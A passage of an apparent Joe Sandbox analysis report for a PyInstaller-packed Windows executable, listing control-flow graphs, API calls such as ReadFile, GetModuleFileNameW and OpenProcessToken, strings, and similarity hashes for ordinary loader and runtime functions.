                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 727 7ff7262aad6c-7ff7262aad92 728 7ff7262aad94-7ff7262aada8 call 7ff7262a43d4 call 7ff7262a43f4 727->728 729 7ff7262aadad-7ff7262aadb1 727->729 747 7ff7262ab19e 728->747 731 7ff7262ab187-7ff7262ab193 call 7ff7262a43d4 call 7ff7262a43f4 729->731 732 7ff7262aadb7-7ff7262aadbe 729->732 749 7ff7262ab199 call 7ff7262a9bf0 731->749 732->731 734 7ff7262aadc4-7ff7262aadf2 732->734 734->731 737 7ff7262aadf8-7ff7262aadff 734->737 741 7ff7262aae01-7ff7262aae13 call 7ff7262a43d4 call 7ff7262a43f4 737->741 742 7ff7262aae18-7ff7262aae1b 737->742 741->749 745 7ff7262aae21-7ff7262aae27 742->745 746 7ff7262ab183-7ff7262ab185 742->746 745->746 751 7ff7262aae2d-7ff7262aae30 745->751 750 7ff7262ab1a1-7ff7262ab1b8 746->750 747->750 749->747 751->741 754 7ff7262aae32-7ff7262aae57 751->754 756 7ff7262aae59-7ff7262aae5b 754->756 757 7ff7262aae8a-7ff7262aae91 754->757 760 7ff7262aae82-7ff7262aae88 756->760 761 7ff7262aae5d-7ff7262aae64 756->761 758 7ff7262aae66-7ff7262aae7d call 7ff7262a43d4 call 7ff7262a43f4 call 7ff7262a9bf0 757->758 759 7ff7262aae93-7ff7262aaebb call 7ff7262ac90c call 7ff7262a9c58 * 2 757->759 788 7ff7262ab010 758->788 790 7ff7262aaed8-7ff7262aaf03 call 7ff7262ab594 759->790 791 7ff7262aaebd-7ff7262aaed3 call 7ff7262a43f4 call 7ff7262a43d4 759->791 762 7ff7262aaf08-7ff7262aaf1f 760->762 761->758 761->760 765 7ff7262aaf21-7ff7262aaf29 762->765 766 7ff7262aaf9a-7ff7262aafa4 call 7ff7262b2c2c 762->766 765->766 769 7ff7262aaf2b-7ff7262aaf2d 765->769 779 7ff7262aafaa-7ff7262aafbf 766->779 780 7ff7262ab02e 766->780 769->766 773 7ff7262aaf2f-7ff7262aaf45 769->773 773->766 777 7ff7262aaf47-7ff7262aaf53 773->777 777->766 784 7ff7262aaf55-7ff7262aaf57 777->784 779->780 782 7ff7262aafc1-7ff7262aafd3 GetConsoleMode 779->782 786 7ff7262ab033-7ff7262ab053 ReadFile 780->786 782->780 787 7ff7262aafd5-7ff7262aafdd 782->787 784->766 789 7ff7262aaf59-7ff7262aaf71 784->789 792 7ff7262ab059-7ff7262ab061 786->792 793 7ff7262ab14d-7ff7262ab156 GetLastError 786->793 787->786 795 7ff7262aafdf-7ff7262ab001 ReadConsoleW 787->795 798 7ff7262ab013-7ff7262ab01d call 7ff7262a9c58 788->798 789->766 799 7ff7262aaf73-7ff7262aaf7f 789->799 790->762 791->788 792->793 801 7ff7262ab067 792->801 796 7ff7262ab173-7ff7262ab176 793->796 797 7ff7262ab158-7ff7262ab16e call 7ff7262a43f4 call 7ff7262a43d4 793->797 803 7ff7262ab022-7ff7262ab02c 795->803 804 7ff7262ab003 GetLastError 795->804 808 7ff7262ab009-7ff7262ab00b call 7ff7262a4368 796->808 809 7ff7262ab17c-7ff7262ab17e 796->809 797->788 798->750 799->766 807 7ff7262aaf81-7ff7262aaf83 799->807 811 7ff7262ab06e-7ff7262ab083 801->811 803->811 804->808 807->766 816 7ff7262aaf85-7ff7262aaf95 807->816 808->788 809->798 811->798 812 7ff7262ab085-7ff7262ab090 811->812 818 7ff7262ab092-7ff7262ab0ab call 7ff7262aa984 812->818 819 7ff7262ab0b7-7ff7262ab0bf 812->819 816->766 827 7ff7262ab0b0-7ff7262ab0b2 818->827 823 7ff7262ab0c1-7ff7262ab0d3 819->823 824 7ff7262ab13b-7ff7262ab148 call 7ff7262aa7c4 819->824 828 7ff7262ab0d5 823->828 829 7ff7262ab12e-7ff7262ab136 823->829 824->827 827->798 831 7ff7262ab0da-7ff7262ab0e1 828->831 829->798 832 7ff7262ab0e3-7ff7262ab0e7 831->832 833 7ff7262ab11d-7ff7262ab128 831->833 834 7ff7262ab103 832->834 835 7ff7262ab0e9-7ff7262ab0f0 832->835 833->829 837 7ff7262ab109-7ff7262ab119 834->837 835->834 836 7ff7262ab0f2-7ff7262ab0f6 835->836 836->834 838 7ff7262ab0f8-7ff7262ab101 836->838 837->831 839 7ff7262ab11b 837->839 838->837 839->829
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                  • Instruction ID: 778c7d77f0b6606604b95e315ef4dae584538a1455b7272e40b268bc504bf9d7
                                                                                                                                  • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                  • Instruction Fuzzy Hash: 81C1DF22A0C68691EA65AB149C402BFB7D0FF90BA0F954137EA4D07791DFBDEC55CB20

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                  • Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                  • Instruction ID: 3e1780c02cbe24dd21d17de968e52427833022201098603d576c62f7835b91cc
                                                                                                                                  • Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                  • Instruction Fuzzy Hash: 19215121A0DA4642EB10AB55AC4423BF3E1EFD57A4FA00636EA6D43AE4EF7CD5458B10

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF726293534), ref: 00007FF726293411
                                                                                                                                    • Part of subcall function 00007FF7262929E0: GetLastError.KERNEL32(?,?,?,00007FF72629342E,?,00007FF726293534), ref: 00007FF726292A14
                                                                                                                                    • Part of subcall function 00007FF7262929E0: FormatMessageW.KERNEL32(?,?,?,00007FF72629342E), ref: 00007FF726292A7D
                                                                                                                                    • Part of subcall function 00007FF7262929E0: MessageBoxW.USER32 ref: 00007FF726292ACF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                  • API String ID: 517058245-2863816727
                                                                                                                                  • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                  • Instruction ID: 9dc1b722612b06b8a2c562574c59f84e4060ea500cd68a3d7f299d8da78c8c1f
                                                                                                                                  • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                  • Instruction Fuzzy Hash: 1A216B21B1A54291FA21BB24ED513BBA2D0FF88395FD01133D65D865E5FF2CE6098F20

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00007FF726297B50: GetCurrentProcess.KERNEL32 ref: 00007FF726297B70
                                                                                                                                    • Part of subcall function 00007FF726297B50: OpenProcessToken.ADVAPI32 ref: 00007FF726297B83
                                                                                                                                    • Part of subcall function 00007FF726297B50: GetTokenInformation.KERNELBASE ref: 00007FF726297BA8
                                                                                                                                    • Part of subcall function 00007FF726297B50: GetLastError.KERNEL32 ref: 00007FF726297BB2
                                                                                                                                    • Part of subcall function 00007FF726297B50: GetTokenInformation.KERNELBASE ref: 00007FF726297BF2
                                                                                                                                    • Part of subcall function 00007FF726297B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF726297C0E
                                                                                                                                    • Part of subcall function 00007FF726297B50: CloseHandle.KERNEL32 ref: 00007FF726297C26
                                                                                                                                  • LocalFree.KERNEL32(?,00007FF726293814), ref: 00007FF72629848C
                                                                                                                                  • LocalFree.KERNEL32(?,00007FF726293814), ref: 00007FF726298495
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                  • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                  • Instruction ID: c8d6857e68bcfeb19cb829ad77f6b5aca7df93a781c9036d57891d9d9caad7b8
                                                                                                                                  • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                  • Instruction Fuzzy Hash: 89213E21A1964282FA14BB10EC553EBA2E4FF88780FD45437EA4D53796EF3CD6458F60
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(00000000,?,00007FF72629324C,?,?,00007FF726293964), ref: 00007FF726297642
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                  • Opcode ID: 2c89eec29aeb9772413d30908ff664029992db9044f6d674e1a207c7a7cb4ecf
                                                                                                                                  • Instruction ID: a373686081094c9847619f91ab10176f09676f8839e828d914a78d43b2ed37bb
                                                                                                                                  • Opcode Fuzzy Hash: 2c89eec29aeb9772413d30908ff664029992db9044f6d674e1a207c7a7cb4ecf
                                                                                                                                  • Instruction Fuzzy Hash: 1D31AB2171AAC685EA61A715EC107EBA294EBC4BE0F944632EE5D477C5EF2CD3058B10
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7262AC25B), ref: 00007FF7262AC38C
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7262AC25B), ref: 00007FF7262AC417
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                  • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                  • Instruction ID: 751f1aea73a66aa37c3f2874449328d82715a9d5998adbfcc5cd176cadacfa95
                                                                                                                                  • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                  • Instruction Fuzzy Hash: 4991B672F08651C5F750EF699C402BEABE0FB04BA8F945136DE4E66A85DF78D841CB20
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                  • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                  • Instruction ID: 129253c3dcc4542beb1f951b6f6fd15d82bf845acaf54c7847e8d7e71b747865
                                                                                                                                  • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                  • Instruction Fuzzy Hash: B9512972F041118AEB14EF649D452BEB7E5EB14378F900136DDAD52AE5DF38E802CB50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                  • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                  • Instruction ID: 26dbcc6e5d5ce327e4afea09ce6102755b5ad8fed824e4fe67dedc1d98a6ad76
                                                                                                                                  • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                  • Instruction Fuzzy Hash: D9517022E046418AFB54EF71DC503BEA3E1EB48B68F608536DE0D47689DF78D8458B60
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                  • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                  • Instruction ID: 0e7866e236ff5ccf746bf58c67b62c2c8f071856983cc672036b8df729476fa6
                                                                                                                                  • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                  • Instruction Fuzzy Hash: 44419822D1878243E754AB609E5037AB291FB94774F509336DB9C03AD6DFBCE9E08B50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                  • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                  • Instruction ID: 1f8f2b552521d2c3a642081a1e6c9a20627f16802368a618c8766bc03699faff
                                                                                                                                  • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                  • Instruction Fuzzy Hash: 46313A21B0A142C5FA14BB649C113BB92D1EF85384FE42037EA0E476D3EF6CAA048E71
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                  • Instruction ID: d582b5c34c66541cca1c90f9afae8c26c02ac99612e6ab0c67ae4c5d8dc507e1
                                                                                                                                  • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                  • Instruction Fuzzy Hash: 2DD09E10F28A068BEB543B705C5927B9291DF9C712F94543BD84B0A393CF7CEC0D8AA0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                  • Instruction ID: 6b588bf498e62ca94bab66f241dd385c13133399727b94ff28127d4442e725e7
                                                                                                                                  • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                  • Instruction Fuzzy Hash: 8051C461A0A34246E6A4EE259D0067BA2D1EF84BB4FA48636DE7C477D5EF3CD540CE20
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                  • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                  • Instruction ID: d5462a60e5a8b25fb093d53026def270724af746bbd09de00150e256498cec99
                                                                                                                                  • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                  • Instruction Fuzzy Hash: 5811C462608B8181DA10AB25AC5417AF3A1EB44BF4F944332EE7D07BEACF7CD450CB40
                                                                                                                                  APIs
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7262A4B49), ref: 00007FF7262A4C67
                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7262A4B49), ref: 00007FF7262A4C7D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
